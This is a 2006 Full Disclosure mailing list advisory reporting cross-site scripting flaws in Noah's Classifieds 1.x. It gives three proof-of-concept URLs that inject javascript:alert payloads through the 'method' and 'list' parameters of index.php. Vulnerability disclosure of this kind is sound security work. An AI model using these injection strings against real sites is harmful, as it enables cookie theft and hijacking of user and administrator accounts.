Full Disclosure mailing list archives
Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities
From: "0o_zeus_o0 security-mx.org" <zeus.olimpusklan () gmail com>
Date: Wed, 8 Mar 2006 21:17:50 -0600
########################################################################### # Advisory #10 Title: Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities # # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus () diosdelared com # Website: www.elitemexico.org # Date: 09/03/2006 # Risk: Medium # Vendor Url: http://classifieds.phpoutsourcing.com/ # Affected Software: Noah's Classifieds # Non Affected: # # We Are: olimpus klan team # #Info: ################################################################## #this bug consists of inserting script in the line of execution of # #the affected system causing the robbery of cookie and like consequence # #the identity robbery of the affected user or administrator # # #Example XSS: ################################################################## # #http://www.example.com/[dirpath]/index.php?method=showhtmllist&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`> # #http://www.example.com/[dirpath]/index.php?method=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`> # #http://www.example.com/[dirpath]/index.php?method=login_form&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`> # ################################################################## # #Solution: ################################################################## # #VULNERABLE VERSIONS ################################################################## # #1.x Other versions may also be affected. # ################################################################## #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.elitemexico.org ################################################################## #greetz: lady fire,Mi beba, olimpus klan team and elitemexico ##############################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities 0o_zeus_o0 security-mx.org (Mar 08)